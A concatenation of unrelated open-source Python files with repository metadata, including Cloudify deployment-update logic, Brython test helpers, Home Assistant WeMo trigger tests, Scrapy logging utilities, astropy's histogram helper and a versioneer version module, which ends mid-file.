'removed_instance_ids':
extract_ids(removed_instances.get(NODE_MOD_TYPES.AFFECTED)),
'remove_target_instance_ids':
extract_ids(removed_instances.get(NODE_MOD_TYPES.RELATED))
}
if not workflow_id:
# Whether or not execute install or uninstall
parameters['skip_install'] = skip_install
parameters['skip_uninstall'] = skip_uninstall
return self._execute_workflow(
deployment_update=dep_update,
workflow_id=workflow_id or DEFAULT_DEPLOYMENT_UPDATE_WORKFLOW,
parameters=parameters)
def finalize_commit(self, deployment_update_id):
""" finalizes the update process by removing any removed
node/node instances and updating any reduced node
:param deployment_update_id:
:return:
"""
dep_update = self.get_deployment_update(deployment_update_id)
# mark deployment update as finalizing
dep_update.state = STATES.FINALIZING
self.sm.update(dep_update)
# The order of these matter
for finalize in [self._deployment_handler.finalize,
self._node_instance_handler.finalize,
self._node_handler.finalize]:
finalize(dep_update)
# mark deployment update as successful
dep_update.state = STATES.SUCCESSFUL
self.sm.update(dep_update)
return self.get_deployment_update(deployment_update_id)
def _execute_workflow(self,
deployment_update,
workflow_id,
parameters=None,
allow_custom_parameters=False,
force=False):
"""Executes the specified workflow
:param deployment_update:
:param workflow_id:
:param parameters:
:param allow_custom_parameters:
:param force:
:return:
"""
deployment_id = deployment_update.deployment_id
deployment = self.sm.get(models.Deployment, deployment_id)
blueprint_id = deployment.blueprint_id
if workflow_id not in deployment.workflows:
raise manager_exceptions.NonexistentWorkflowError(
'Workflow {0} does not exist in deployment {1}'
.format(workflow_id, deployment_id))
workflow = deployment.workflows[workflow_id]
execution_parameters = \
ResourceManager._merge_and_validate_execution_parameters(
workflow, workflow_id, parameters, allow_custom_parameters)
execution_id = str(uuid.uuid4())
new_execution = models.Execution(
id=execution_id,
status=ExecutionState.PENDING,
created_at=utils.get_formatted_timestamp(),
workflow_id=workflow_id,
error='',
parameters=ResourceManager._get_only_user_execution_parameters(
execution_parameters),
is_system_workflow=False)
if deployment:
new_execution.set_deployment(deployment)
deployment_update.execution = new_execution
self.sm.put(new_execution)
# executing the user workflow
workflow_plugins = \
deployment_update.deployment_plan[
constants.WORKFLOW_PLUGINS_TO_INSTALL]
workflow_executor.execute_workflow(
workflow_id,
workflow,
workflow_plugins=workflow_plugins,
blueprint_id=blueprint_id,
deployment_id=deployment_id,
execution_id=execution_id,
execution_parameters=execution_parameters)
return new_execution
# What we need to access this manager in Flask
def get_deployment_updates_manager():
"""
Get the current app's deployment updates manager, create if necessary
"""
return current_app.config.setdefault('deployment_updates_manager',
DeploymentUpdateManager())
|
{
"content_hash": "9dce18c77d2cb2a339efbf58c1a4c6a9",
"timestamp": "",
"source": "github",
"line_count": 514,
"max_line_length": 79,
"avg_line_length": 39.63035019455253,
"alnum_prop": 0.587825233186058,
"repo_name": "isaac-s/cloudify-manager",
"id": "0be56b526929138dabf7e59349a05b397d721c34",
"size": "21013",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rest-service/manager_rest/deployment_update/manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Clojure",
"bytes": "4067"
},
{
"name": "Mako",
"bytes": "541"
},
{
"name": "Python",
"bytes": "1793118"
},
{
"name": "Ruby",
"bytes": "40193"
},
{
"name": "Shell",
"bytes": "41526"
}
],
"symlink_target": ""
}
|
import sys
import time
import tb as traceback
from browser import console
def discover_brython_test_modules():
# TODO : Test discovery based on file system paths
return [
("Core language features", [
("test_suite.py", "basic test suite"),
("test_rmethods.py", "reflected methods"),
("test_bytes.py", "bytes"),
("test_classes.py", "classes"),
("test_decorators.py", "decorators"),
("test_descriptors.py", "descriptors"),
("test_dict.py", "dicts"),
("test_exec.py", "exec / eval"),
("test_generators.py", "generators"),
("test_import.py", "imports"),
("test_iterators.py", "iterators"),
("test_jsobjects.py", "Javascript objects"),
("test_list.py", "lists"),
("test_memoryview.py", "memoryview"),
("test_numbers.py", "numbers"),
("test_print.py", "print"),
("test_set.py", "sets"),
("test_special_methods.py", "special methods"),
("test_strings.py", "strings"),
("test_fstrings.py", "f-strings"),
("test_string_format.py", "string format"),
("test_string_methods.py", "string methods")
]),
("DOM interface", [
("dom.py", "DOM")
]),
("Issues", [
("issues_gc.py", "issues (GC)"),
("issues_bb.py", "issues (BB)"),
("issues.py", "issues")
]),
("Modules", [
("test_aio.py", "browser.aio"),
("test_binascii.py", "binascii"),
("test_bisect.py", "bisect"),
("test_code.py", "code"),
("test_collections.py", "collections"),
("test_dataclasses.py", "dataclasses"),
("test_datetime.py", "datetime"),
("test_decimals.py", "decimals"),
("test_functools.py", "functools"),
("test_hashlib.py", "hashlib"),
("test_itertools.py", "itertools"),
("test_json.py", "json"),
("test_math.py", "math"),
("test_pickle.py", "pickle"),
("test_random.py", "random"),
("test_re.py", "re"),
("test_storage.py", "storage"),
("test_struct.py", "struct"),
("test_sys.py", "sys"),
("test_types.py", "types"),
("test_unicodedata.py", "unicodedata"),
("test_unittest.py", "unittest"),
("test_urllib.py", "urllib"),
#("test_indexedDB.py", "indexedDB"),
#("test_time.py", "time"),
])
]
def populate_testmod_input(elem, selected=None):
"""Build a multiple selection control including test modules
"""
from browser import html
groups = discover_brython_test_modules()
for label, options in groups:
if selected and label not in selected:
continue
g = html.OPTGROUP(label=label)
elem <= g
for filenm, caption in options:
if filenm == selected:
o = html.OPTION(caption, value=filenm, selected='')
else:
o = html.OPTION(caption, value=filenm)
g <= o
def run(src, file_path=None):
t0 = time.perf_counter()
msg = ''
try:
ns = {'__name__':'__main__'}
if file_path is not None:
ns['__file__'] = file_path
exec(src, ns)
state = 1
except Exception as exc:
msg = traceback.format_exc()
print(msg, file=sys.stderr)
state = 0
t1 = time.perf_counter()
return state, t0, t1, msg
def run_test_module(filename, base_path=''):
if base_path and not base_path.endswith('/'):
base_path += '/'
file_path = base_path + filename
src = open(file_path).read()
return run(src, file_path)
|
{
"content_hash": "01962144299c0ad27216c91afd44b581",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 67,
"avg_line_length": 34.19090909090909,
"alnum_prop": 0.5099707524594522,
"repo_name": "kikocorreoso/brython",
"id": "64dcf3669e23da32daf225816ca69f693a5bdc3f",
"size": "3761",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "www/tests/brython_test_utils/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "21158"
},
{
"name": "HTML",
"bytes": "5011615"
},
{
"name": "JavaScript",
"bytes": "7230101"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "19224768"
},
{
"name": "Roff",
"bytes": "21126"
},
{
"name": "VBScript",
"bytes": "481"
}
],
"symlink_target": ""
}
|
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000)
|
{
"content_hash": "232aba3b95bf6ad8d3df7513cd572493",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 40,
"avg_line_length": 18.454545454545453,
"alnum_prop": 0.6059113300492611,
"repo_name": "vsilent/smarty-bot",
"id": "97acdbc5df3ddcdaed1a6456e521fde23ee69e46",
"size": "203",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "http/web.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2163"
},
{
"name": "Dockerfile",
"bytes": "741"
},
{
"name": "HTML",
"bytes": "4223"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "974421"
},
{
"name": "Shell",
"bytes": "556"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_marooned_pirate_rod_f.iff"
result.attribute_template_id = 9
result.stfName("npc_name","rodian_base_female")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
{
"content_hash": "234933c85a4b36ca9dc7d0332253f046",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 75,
"avg_line_length": 24,
"alnum_prop": 0.6987179487179487,
"repo_name": "obi-two/Rebelion",
"id": "a075eae71764f79aead994cd7afb6c801a774487",
"size": "457",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/mobile/shared_dressed_marooned_pirate_rod_f.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
}
|
"""Verify that WeMo device triggers work as expected."""
import pytest
from pywemo.subscribe import EVENT_TYPE_LONG_PRESS
from homeassistant.components.automation import DOMAIN as AUTOMATION_DOMAIN
from homeassistant.components.light import DOMAIN as LIGHT_DOMAIN
from homeassistant.components.wemo.const import DOMAIN, WEMO_SUBSCRIPTION_EVENT
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_DOMAIN,
CONF_ENTITY_ID,
CONF_PLATFORM,
CONF_TYPE,
)
from homeassistant.setup import async_setup_component
from tests.common import (
assert_lists_same,
async_get_device_automations,
async_mock_service,
)
MOCK_DEVICE_ID = "some-device-id"
DATA_MESSAGE = {"message": "service-called"}
@pytest.fixture
def pywemo_model():
"""Pywemo Dimmer models use the light platform (WemoDimmer class)."""
return "Dimmer"
async def setup_automation(hass, device_id, trigger_type):
"""Set up an automation trigger for testing triggering."""
return await async_setup_component(
hass,
AUTOMATION_DOMAIN,
{
AUTOMATION_DOMAIN: [
{
"trigger": {
CONF_PLATFORM: "device",
CONF_DOMAIN: DOMAIN,
CONF_DEVICE_ID: device_id,
CONF_TYPE: trigger_type,
},
"action": {
"service": "test.automation",
"data": DATA_MESSAGE,
},
},
]
},
)
async def test_get_triggers(hass, wemo_entity):
"""Test that the triggers appear for a supported device."""
assert wemo_entity.device_id is not None
expected_triggers = [
{
CONF_DEVICE_ID: wemo_entity.device_id,
CONF_DOMAIN: DOMAIN,
CONF_PLATFORM: "device",
CONF_TYPE: EVENT_TYPE_LONG_PRESS,
},
{
CONF_DEVICE_ID: wemo_entity.device_id,
CONF_DOMAIN: LIGHT_DOMAIN,
CONF_ENTITY_ID: wemo_entity.entity_id,
CONF_PLATFORM: "device",
CONF_TYPE: "turned_off",
},
{
CONF_DEVICE_ID: wemo_entity.device_id,
CONF_DOMAIN: LIGHT_DOMAIN,
CONF_ENTITY_ID: wemo_entity.entity_id,
CONF_PLATFORM: "device",
CONF_TYPE: "turned_on",
},
]
triggers = await async_get_device_automations(
hass, "trigger", wemo_entity.device_id
)
assert_lists_same(triggers, expected_triggers)
async def test_fires_on_long_press(hass):
"""Test wemo long press trigger firing."""
assert await setup_automation(hass, MOCK_DEVICE_ID, EVENT_TYPE_LONG_PRESS)
calls = async_mock_service(hass, "test", "automation")
message = {CONF_DEVICE_ID: MOCK_DEVICE_ID, CONF_TYPE: EVENT_TYPE_LONG_PRESS}
hass.bus.async_fire(WEMO_SUBSCRIPTION_EVENT, message)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data == DATA_MESSAGE
|
{
"content_hash": "afc3e318ea950a7ee78ad0470f2f436e",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 80,
"avg_line_length": 31.142857142857142,
"alnum_prop": 0.5923984272608126,
"repo_name": "lukas-hetzenecker/home-assistant",
"id": "76016469b727e3ddc0ebdc83816811e8765158c7",
"size": "3052",
"binary": false,
"copies": "5",
"ref": "refs/heads/dev",
"path": "tests/components/wemo/test_device_trigger.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2443"
},
{
"name": "Python",
"bytes": "38023745"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
}
|
"""Stub file to maintain backwards compatibility."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import,unused-import
from tensorflow.python.tpu.error_handling import *
# pylint: enable=wildcard-import,unused-import
|
{
"content_hash": "334590813a7da48a58f4e43d4d1988de",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 52,
"avg_line_length": 34.44444444444444,
"alnum_prop": 0.7806451612903226,
"repo_name": "jbedorf/tensorflow",
"id": "1b1328b4075d9a737e40693c13e33e0b7c1fbedf",
"size": "995",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/tpu/python/tpu/error_handling.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3560"
},
{
"name": "Batchfile",
"bytes": "14734"
},
{
"name": "C",
"bytes": "647467"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "59799751"
},
{
"name": "CMake",
"bytes": "207169"
},
{
"name": "Dockerfile",
"bytes": "75509"
},
{
"name": "Go",
"bytes": "1508512"
},
{
"name": "HTML",
"bytes": "4680118"
},
{
"name": "Java",
"bytes": "908330"
},
{
"name": "Jupyter Notebook",
"bytes": "2510253"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "94633"
},
{
"name": "Objective-C",
"bytes": "60069"
},
{
"name": "Objective-C++",
"bytes": "118322"
},
{
"name": "PHP",
"bytes": "15108"
},
{
"name": "Pascal",
"bytes": "770"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "46379626"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "838"
},
{
"name": "Shell",
"bytes": "480235"
},
{
"name": "Smarty",
"bytes": "27249"
},
{
"name": "Swift",
"bytes": "53109"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, unicode_literals
import numpy as np
from ..stats import histogram
from ..utils.compat.funcsigs import signature
__all__ = ['hist']
def hist(x, bins=10, ax=None, **kwargs):
"""Enhanced histogram function
This is a histogram function that enables the use of more sophisticated
algorithms for determining bins. Aside from the ``bins`` argument allowing
a string specified how bins are computed, the parameters are the same
as pylab.hist().
This function was ported from astroML: http://astroML.org/
Parameters
----------
x : array_like
array of data to be histogrammed
bins : int or list or str (optional)
If bins is a string, then it must be one of:
- 'blocks' : use bayesian blocks for dynamic bin widths
- 'knuth' : use Knuth's rule to determine bins
- 'scott' : use Scott's rule to determine bins
- 'freedman' : use the Freedman-diaconis rule to determine bins
ax : Axes instance (optional)
specify the Axes on which to draw the histogram. If not specified,
then the current active axes will be used.
**kwargs :
other keyword arguments are described in ``plt.hist()``.
Notes
-----
Return values are the same as for ``plt.hist()``
See Also
--------
astropy.stats.histogram
"""
# arguments of np.histogram should be passed to astropy.stats.histogram
arglist = list(signature(np.histogram).parameters.keys())[1:]
np_hist_kwds = dict((key, kwargs[key]) for key in arglist if key in kwargs)
hist, bins = histogram(x, bins, **np_hist_kwds)
if ax is None:
# optional dependency; only import if strictly needed.
import matplotlib.pyplot as plt
ax = plt.gca()
return ax.hist(x, bins, **kwargs)
|
{
"content_hash": "5bc20394d10817dccd62fee6247602ea",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 79,
"avg_line_length": 30.360655737704917,
"alnum_prop": 0.6538876889848813,
"repo_name": "kelle/astropy",
"id": "3f5248588f6a29204d7eca3c64edb13a6c300688",
"size": "1917",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "astropy/visualization/hist.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "366877"
},
{
"name": "C++",
"bytes": "1825"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Jupyter Notebook",
"bytes": "62553"
},
{
"name": "Python",
"bytes": "8072264"
},
{
"name": "Shell",
"bytes": "446"
},
{
"name": "TeX",
"bytes": "778"
}
],
"symlink_target": ""
}
|
import sys
import logging
import warnings
from logging.config import dictConfig
from twisted.python.failure import Failure
from twisted.python import log as twisted_log
import scrapy
from scrapy.settings import overridden_settings, Settings
from scrapy.exceptions import ScrapyDeprecationWarning
logger = logging.getLogger(__name__)
def failure_to_exc_info(failure):
"""Extract exc_info from Failure instances"""
if isinstance(failure, Failure):
return (failure.type, failure.value, failure.getTracebackObject())
class TopLevelFormatter(logging.Filter):
"""Keep only top level loggers's name (direct children from root) from
records.
This filter will replace Scrapy loggers' names with 'scrapy'. This mimics
the old Scrapy log behaviour and helps shortening long names.
Since it can't be set for just one logger (it won't propagate for its
children), it's going to be set in the root handler, with a parametrized
`loggers` list where it should act.
"""
def __init__(self, loggers=None):
self.loggers = loggers or []
def filter(self, record):
if any(record.name.startswith(l + '.') for l in self.loggers):
record.name = record.name.split('.', 1)[0]
return True
DEFAULT_LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'loggers': {
'scrapy': {
'level': 'DEBUG',
},
'twisted': {
'level': 'ERROR',
},
}
}
def configure_logging(settings=None, install_root_handler=True):
"""
Initialize logging defaults for Scrapy.
:param settings: settings used to create and configure a handler for the
root logger (default: None).
:type settings: dict, :class:`~scrapy.settings.Settings` object or ``None``
:param install_root_handler: whether to install root logging handler
(default: True)
:type install_root_handler: bool
This function does:
- Route warnings and twisted logging through Python standard logging
- Assign DEBUG and ERROR level to Scrapy and Twisted loggers respectively
- Route stdout to log if LOG_STDOUT setting is True
When ``install_root_handler`` is True (default), this function also
creates a handler for the root logger according to given settings
(see :ref:`topics-logging-settings`). You can override default options
using ``settings`` argument. When ``settings`` is empty or None, defaults
are used.
"""
if not sys.warnoptions:
# Route warnings through python logging
logging.captureWarnings(True)
observer = twisted_log.PythonLoggingObserver('twisted')
observer.start()
dictConfig(DEFAULT_LOGGING)
if isinstance(settings, dict) or settings is None:
settings = Settings(settings)
if settings.getbool('LOG_STDOUT'):
sys.stdout = StreamLogger(logging.getLogger('stdout'))
if install_root_handler:
install_scrapy_root_handler(settings)
def install_scrapy_root_handler(settings):
global _scrapy_root_handler
if (_scrapy_root_handler is not None
and _scrapy_root_handler in logging.root.handlers):
logging.root.removeHandler(_scrapy_root_handler)
logging.root.setLevel(logging.NOTSET)
_scrapy_root_handler = _get_handler(settings)
logging.root.addHandler(_scrapy_root_handler)
def get_scrapy_root_handler():
return _scrapy_root_handler
_scrapy_root_handler = None
def _get_handler(settings):
""" Return a log handler object according to settings """
filename = settings.get('LOG_FILE')
if filename:
encoding = settings.get('LOG_ENCODING')
handler = logging.FileHandler(filename, encoding=encoding)
elif settings.getbool('LOG_ENABLED'):
handler = logging.StreamHandler()
else:
handler = logging.NullHandler()
formatter = logging.Formatter(
fmt=settings.get('LOG_FORMAT'),
datefmt=settings.get('LOG_DATEFORMAT')
)
handler.setFormatter(formatter)
handler.setLevel(settings.get('LOG_LEVEL'))
if settings.getbool('LOG_SHORT_NAMES'):
handler.addFilter(TopLevelFormatter(['scrapy']))
return handler
def log_scrapy_info(settings):
logger.info("Scrapy %(version)s started (bot: %(bot)s)",
{'version': scrapy.__version__, 'bot': settings['BOT_NAME']})
d = dict(overridden_settings(settings))
logger.info("Overridden settings: %(settings)r", {'settings': d})
class StreamLogger(object):
"""Fake file-like stream object that redirects writes to a logger instance
Taken from:
http://www.electricmonk.nl/log/2011/08/14/redirect-stdout-and-stderr-to-a-logger-in-python/
"""
def __init__(self, logger, log_level=logging.INFO):
self.logger = logger
self.log_level = log_level
self.linebuf = ''
def write(self, buf):
for line in buf.rstrip().splitlines():
self.logger.log(self.log_level, line.rstrip())
def flush(self):
for h in self.logger.handlers:
h.flush()
class LogCounterHandler(logging.Handler):
"""Record log levels count into a crawler stats"""
def __init__(self, crawler, *args, **kwargs):
super(LogCounterHandler, self).__init__(*args, **kwargs)
self.crawler = crawler
def emit(self, record):
sname = 'log_count/{}'.format(record.levelname)
self.crawler.stats.inc_value(sname)
def logformatter_adapter(logkws):
"""
Helper that takes the dictionary output from the methods in LogFormatter
and adapts it into a tuple of positional arguments for logger.log calls,
handling backward compatibility as well.
"""
if not {'level', 'msg', 'args'} <= set(logkws):
warnings.warn('Missing keys in LogFormatter method',
ScrapyDeprecationWarning)
if 'format' in logkws:
warnings.warn('`format` key in LogFormatter methods has been '
'deprecated, use `msg` instead',
ScrapyDeprecationWarning)
level = logkws.get('level', logging.INFO)
message = logkws.get('format', logkws.get('msg'))
# NOTE: This also handles 'args' being an empty dict, that case doesn't
# play well in logger.log calls
args = logkws if not logkws.get('args') else logkws['args']
return (level, message, args)
|
{
"content_hash": "624d53c9b516c0d97a39c5fba7bc67ba",
"timestamp": "",
"source": "github",
"line_count": 201,
"max_line_length": 99,
"avg_line_length": 31.761194029850746,
"alnum_prop": 0.6666666666666666,
"repo_name": "shaform/scrapy",
"id": "6ceb61a824b3b4687ee1f6304a02e9b51bcbec2b",
"size": "6409",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "scrapy/utils/log.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "2076"
},
{
"name": "Python",
"bytes": "1307384"
},
{
"name": "Roff",
"bytes": "2010"
},
{
"name": "Shell",
"bytes": "258"
}
],
"symlink_target": ""
}
|
import io
import os
from queue import Queue
from aioworkers import utils
from aioworkers.core.config import Config
from aioworkers.core.context import Context
from aioworkers.queue import proxy
async def test_q(event_loop):
conf = Config()
conf.update({'q.cls': utils.import_uri(proxy.ProxyQueue)})
async with Context(conf, loop=event_loop) as ctx:
ctx.q.set_queue(Queue())
await ctx.q.put(1)
assert 1 == await ctx.q.get()
async def test_plq(event_loop):
conf = Config()
conf.update(
{
'q.cls': utils.import_uri(proxy.PipeLineQueue),
'q.format': 'newline:str',
}
)
async with Context(conf, loop=event_loop) as ctx:
nl = os.linesep.encode()
fin = io.BytesIO(b'123' + nl)
fout = io.BytesIO()
ctx.q.set_reader(fin)
ctx.q.set_writer(fout)
assert '123' == await ctx.q.get()
await ctx.q.put('1')
assert b'1' + nl == fout.getvalue()
|
{
"content_hash": "a9df50211e53743188bc190283a01634",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 62,
"avg_line_length": 26.026315789473685,
"alnum_prop": 0.6056622851365016,
"repo_name": "aioworkers/aioworkers",
"id": "a5471af8e3458301df05eb3b610f97ab178c5929",
"size": "989",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_queue_proxy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "303"
},
{
"name": "Python",
"bytes": "220824"
}
],
"symlink_target": ""
}
|
from . import registration
from . import user
from . import test
from . import hype
from . import organize
from . import mentor
from . import judge
from .index import IndexPage
from .help import HelpPage
from .links.index import LinksPage
from .hacks.index import HacksPage
from django.shortcuts import render
def handler404(request):
response = render(request, 'error/404/index.html')
response.status_code = 404
return response
def handler500(request):
response = render(request, 'error/500/index.html')
response.status_code = 500
return response
|
{
"content_hash": "ed0709e25f6016a240b344d632533e14",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 54,
"avg_line_length": 24,
"alnum_prop": 0.7534722222222222,
"repo_name": "andrewsosa/hackfsu_com",
"id": "663b02fc8d8017c92ee1cdb0161d14b277dbaeef",
"size": "576",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "api/webapp/views/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "81944"
},
{
"name": "HTML",
"bytes": "88639"
},
{
"name": "JavaScript",
"bytes": "127887"
},
{
"name": "Python",
"bytes": "279510"
},
{
"name": "Shell",
"bytes": "897"
}
],
"symlink_target": ""
}
|
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "micom-"
cfg.versionfile_source = "micom/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
